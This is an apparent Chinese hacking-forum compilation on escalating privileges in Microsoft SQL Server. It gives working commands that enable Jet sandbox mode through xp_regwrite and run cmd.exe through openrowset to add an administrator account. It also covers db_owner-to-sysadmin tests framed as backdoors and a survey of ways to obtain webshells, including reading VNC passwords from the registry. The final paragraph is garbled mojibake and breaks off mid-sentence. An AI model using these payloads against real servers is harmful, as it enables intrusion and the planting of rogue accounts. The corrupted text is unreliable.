SA权限仅需xp_regwrite即可有dos shell
KingMeTaL 说我:“SA权限你都搞不定`你杂混的”
很受打击
按照以下文章做了一遍,但是还是不行
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠,不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\
windows\system32\
如果有回显,可以看到执行返回结果,否则需要先判断主机OS类型再试
当然如果野蛮一点,四个轮流来一遍也行。
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')
--------------------------------------------------------------------------------------------------------------------------
db_owner到sysadmin的测试
sql injection终极利用方法》一文影响蛮大的,在叮当群上我们一帮人也讨论并测试了文章里的一点东西,这里把我们测试结果发一下:
在2个前提条件下,文章里的方法是可以实现的
① 连接的dbo用户必须对master有权限
② SQL必须设置为“允许对系统目录直接进行修改”(SQL Server属性--服务器设置)
这2个条件都是比较苛刻的,尤其是第2条,使的文章里提到的方法的成功率应该不是很高。
如果没有第1条,那么当我们执行drop procedure sp_addlogin操作时就会提示
服务器: 消息 3704,级别 16,状态 1,行 1
用户没有在 过程 'sp_addlogin' 上执行该操作的权限。
没有第2条,我们恢复sp_addlogin事 会提示错误
服务器: 消息 259,级别 16,状态 2,过程 sp_addlogin,行 115
未启用对系统目录的特殊更新。系统管理员必须重新配置 SQL Server 以允许这种操作。
顺便对文章里提到的xp_regwrite进行下测试,测试结果也是要求“连接的dbo用户必须对master有权限”
不过在使用 xp_regread时 并不要要求对master的权限
如果你感兴趣,也可以对其他的“扩展过程”进行这样的测试 :)
虽然文章里面的直接成功率小,但是可以做为 “后门”。
---------------------------------------------------------------------------------------------------------------------------
论在mssql中public和db_owner权限下拿到webshell或者系统权限
BBSSETTEXT:论在mssql中public和db_owner权限下拿到webshell或者系统权限 $TCSPLIT$作者:许文强
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确实要比以前小拉不少,但能否得到webshell,目前成功率还不是很高。第二种就是在下的万能提权,此法成功率几乎为零,只有在特定的条件下面才能实现。第三种就是LCX大虾在《MSSQL db_owner角色注入直接获得系统权限》,所说的利用xp_regread读出VNC在注册表的加密密码,然后破解,直接拿到系统权限,这种方法局限性比较大,要是对方主机没有装vnc,你怎么办。第四种就是利用xp_regwrite再注册表里直接加个系统帐号或者直接写个webshell,在主机重起的时候就可以拿到webshell或者系统权限。此法适用范围比较大,成功率也相对前3种较高点,但缺点也是显而易见的,就是不能够马上得到webshell,需要对方重起。第五种就是利用添加作业的一些存储过程,sp_add_job,sp_addtask之类得到系统权限。理论上应该说是目前这5种里面成功率最高的的一种吧(郁闷,我在本机测试的时候一次也没成功过,可能是操作系统的原因吧)。
看过以上5种方法后,应该说目前在db_owner权限下面得到系统权限的的手段无论是成功率还是从结果来看,都还是不太理想的。呵呵要是我告诉你还有第6种,第7种,第8种呢,而且每个都纫陨先魏我恢值姆椒ǖ某晒β识几摺:呛牵 阈挪恍拧N蚁冉樯芤桓龃蠹矣Ω枚贾 赖模 铱赡艽蠹叶季 S茫 墒侨疵幌氲剿 褂辛硪幻娴姆椒ǎ 野阉 凶觥 魈旃 !T俳樯苤 盎沟糜星敫魑豢垂傧劝盐抑谱鞯亩 匆幌隆?/P>
看拉之后,不知道网管们会做何感想啊,想不到只有相对pu
